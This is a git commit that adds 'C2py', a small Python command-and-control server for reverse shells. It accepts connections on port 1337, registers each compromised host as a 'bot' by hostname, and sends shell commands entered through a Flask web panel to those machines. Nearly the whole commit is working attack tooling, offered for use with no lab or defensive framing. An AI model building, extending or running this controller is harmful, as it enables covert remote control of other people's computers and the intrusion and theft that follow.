batman

2025-09-26 15:54:44 +02:00
commit ef77991a1f
9 changed files with 126 additions and 0 deletions
--- a/.gitignore
+++ b/.gitignore
@@ -0,0 +1,3 @@
+.python-version
+__pycache__
+uv.lock
--- a/README.md
+++ b/README.md
@@ -0,0 +1,4 @@
+# C2py
+
+Python based reverse shell command and control with web interface
+
--- a/c2.py
+++ b/c2.py
@@ -0,0 +1,58 @@
+#!/usr/bin/env python3
+from socket import SOCK_STREAM, AF_INET, socket
+from flask import Flask, request, render_template
+from threading import Thread
+
+
+SOCKET = None
+app = Flask(__name__)
+threads = []
+bots = {}
+
+
+@app.route('/')
+def index():
+    return render_template('index.j2', bots=bots.keys())
+
+
+@app.route('/shell/<name>')
+def shell(name):
+    cmd = request.args.get('cmd')
+    conn = bots.get(name)
+    res = None
+    if cmd and conn:
+        conn.sendall(cmd.encode() + b'\n')
+        res = conn.recv(4096).decode()[:-2].replace('\n', '<br/>')
+    return render_template('shell.j2', name=name, res=res)
+
+
+def thread(target, args=()):
+    thread = Thread(target=target, args=args)
+    threads.append(thread)
+    thread.start()
+    return thread
+
+
+def listen():
+    with socket(AF_INET, SOCK_STREAM) as sock:
+        SOCKET = sock
+        sock.bind(('0.0.0.0', 1337))
+        sock.listen()
+        while 'pwnd':
+            conn, addr = sock.accept()
+            thread(handle, (conn,))
+
+
+def handle(conn):
+    assert conn.recv(2) == b'$ '
+    conn.sendall(b'hostname\n')
+    hostname = conn.recv(255).split(b'\n')[0]
+    bots[hostname.decode()] = conn
+
+
+if __name__ == '__main__':
+    try:
+        thread(listen)
+        app.run()
+    except KeyboardInterrupt:
+        SOCKET.close()
--- a/main.py
+++ b/main.py
@@ -0,0 +1,6 @@
+def main():
+    print("Hello from c2py!")
+
+
+if __name__ == "__main__":
+    main()
--- a/pyproject.toml
+++ b/pyproject.toml
@@ -0,0 +1,9 @@
+[project]
+name = "c2py"
+version = "0.1.0"
+description = "Python based C2 server"
+readme = "README.md"
+requires-python = ">=3.12"
+dependencies = [
+    "flask>=3.1.2",
+]
--- a/static/style.css
+++ b/static/style.css
@@ -0,0 +1,5 @@
+
+body {
+    background-color: #333;
+    color: lime;
+}
--- a/templates/base.j2
+++ b/templates/base.j2
@@ -0,0 +1,11 @@
+<!DOCTYPE html>
+<html lang="en">
+<head>
+    <link rel="stylesheet" href="/static/style.css" />
+    <title>{% block title %}{% endblock %} - C2py</title>
+    {% block head %}{% endblock %}
+</head>
+<body>
+{% block body %}{% endblock %}
+</body>
+</html>
--- a/templates/index.j2
+++ b/templates/index.j2
@@ -0,0 +1,16 @@
+{% extends "base.j2" %}
+{% block title %}Home{% endblock %}
+{% block head %}
+{% endblock %}
+{% block body %}
+<h1>C2py</h1>
+<p class="important">
+Welcome to my awesome command and control admin panel!
+</p>
+<h3>Active bots;</h3>
+{% for bot in bots %}
+<a href='/shell/{{ bot }}' target='_blank'><p>{{ bot }}</p></a>
+{% else %}
+<p>None</p>
+{% endfor %}
+{% endblock %}
--- a/templates/shell.j2
+++ b/templates/shell.j2
@@ -0,0 +1,14 @@
+{% extends "base.j2" %}
+{% block title %}shell - {{ name }}{% endblock %}
+{% block head %}
+{% endblock %}
+{% block body %}
+<h1>C2py - shell - {{ name }}</h1>
+<form method="get" name="{{ name }}">
+<input type="text" name="cmd" autofocus id="cmd" size="80">
+<input type="submit" value="Execute">
+</form>
+{% if res  %}
+<p>{{ res }}</p>
+{% endif %}
+{% endblock %}